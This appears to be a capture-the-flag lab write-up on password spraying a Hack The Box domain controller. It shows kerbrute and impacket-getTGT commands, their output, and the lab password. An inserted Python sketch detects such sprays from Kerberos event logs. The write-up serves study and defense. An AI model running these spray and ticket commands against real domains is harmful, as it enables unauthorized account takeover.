Password Spray


A valid domain credential has been identified. Performing a password spray with that password against the user list (users.txt) to check for reuse.

┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ kerbrute passwordspray --dc dc01.infiltrator.htb -d INFILTRATOR.HTB users.txt 'WAT?watismypass!'  
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 09/01/24 - Ronnie Flathers @ropnop
 
2024/09/01 13:18:42 >  Using KDC(s):
2024/09/01 13:18:42 >  	dc01.infiltrator.htb:88
 
2024/09/01 13:18:42 >  [+] VALID LOGIN:	 l.clark@INFILTRATOR.HTB:WAT?watismypass!
2024/09/01 13:18:42 >  [+] VALID LOGIN:	 d.anderson@INFILTRATOR.HTB:WAT?watismypass!
2024/09/01 13:18:42 >  Done! Tested 12 logins (2 successes) in 0.115 seconds

Password reuse confirmed for the d.anderson user.
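
On the domain controller, a Kerberos spray like the one above shows up as a burst of pre-authentication failures (event 4771, failure code 0x18) from one source across many accounts, and any TGT issued (event 4768) in the same burst marks an account whose password matched. The detection sketch below is an added example, not part of the original write-up; the event tuples, account names, addresses and thresholds are constructed, and the field layout is a simplification of the Windows Security log.

```python
from collections import defaultdict
from datetime import datetime, timedelta

FMT = "%Y-%m-%d %H:%M:%S.%f"

def make_events():
    """Constructed sample (not lab data): (time, event_id, account, client_ip, status)."""
    ev = [(f"2024-09-01 13:18:42.{i:03d}", 4771, f"user{i:02d}", "10.0.0.5", "0x18")
          for i in range(10)]                      # 10 wrong-password AS-REQs
    ev.append(("2024-09-01 13:18:42.050", 4768, "user10", "10.0.0.5", "0x0"))  # TGT issued
    ev.append(("2024-09-01 13:18:42.060", 4768, "user11", "10.0.0.5", "0x0"))  # TGT issued
    ev.append(("2024-09-01 13:20:00.000", 4771, "user03", "10.0.0.9", "0x18"))  # lone typo
    return ev

def is_fail(row):   # 4771 = Kerberos pre-auth failed, 0x18 = bad password
    return row[1] == 4771 and row[3] == "0x18"

def is_tgt(row):    # 4768 = TGT requested, 0x0 = success
    return row[1] == 4768 and row[3] == "0x0"

def detect_spray(events, window=timedelta(seconds=60), min_accounts=5):
    """Flag sources that fail pre-auth for many distinct accounts within one window."""
    by_ip = defaultdict(list)
    for ts, eid, acct, ip, status in events:
        by_ip[ip].append((datetime.strptime(ts, FMT), eid, acct, status))
    alerts = []
    for ip, rows in by_ip.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):
            while rows[end][0] - rows[start][0] > window:
                start += 1                          # slide the window forward
            if len({r[2] for r in rows[start:end + 1] if is_fail(r)}) >= min_accounts:
                t0 = rows[start][0]
                burst = [r for r in rows if t0 <= r[0] <= t0 + window]
                alerts.append({
                    "source": ip,
                    "failed": sorted({r[2] for r in burst if is_fail(r)}),
                    # accounts that got a TGT inside the burst: treat as compromised
                    "succeeded": sorted({r[2] for r in burst if is_tgt(r)}),
                })
                break                               # one alert per source
    return alerts

if __name__ == "__main__":
    for alert in detect_spray(make_events()):
        print(alert)
```

Accounts listed under "succeeded" are the ones to reset first, since a TGT issued inside a failure burst means the sprayed password was correct for them.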

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ impacket-getTGT INFILTRATOR.HTB/d.anderson@dc01.infiltrator.htb -dc-ip $IP                 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password: WAT?watismypass!
[*] Saving ticket in d.anderson@dc01.infiltrator.htb.ccache

Successfully validated against the target KDC. TGT generated for the d.anderson user.